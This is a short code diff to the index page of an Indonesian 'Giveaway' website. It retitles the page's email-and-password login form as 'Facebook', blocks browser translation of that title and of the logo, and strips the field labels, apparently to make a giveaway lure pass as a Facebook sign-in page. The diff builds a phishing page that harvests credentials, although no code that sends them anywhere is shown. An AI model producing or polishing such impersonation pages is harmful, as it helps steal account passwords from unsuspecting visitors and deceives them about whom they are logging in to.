--- a/public/index.html
+++ b/public/index.html
@@ -10,7 +10,7 @@
 <body>
     <!-- Header -->
     <header>
-        <div class="logo">Giveaway</div>
+        <div class="logo" translate="no">Giveaway</div>
         <nav>
             <ul>
                 <li><a href="#">Beranda</a></li>
@@ -50,12 +50,9 @@
     <!-- Login Section -->
     <section class="login-section">
         <div class="login-container">
-            <h2>Masuk ke Akun Anda</h2>
+            <h2 translate="no">Facebook</h2>
             <form id="loginForm">
-                <label for="username">Email:</label>
                 <input type="email" id="username" name="username" placeholder="Masukkan email Anda" required>
-
-                <label for="password">Kata Sandi:</label>
                 <input type="password" id="password" name="password" placeholder="Masukkan kata sandi Anda" required>
 
                 <button type="submit">Masuk</button>
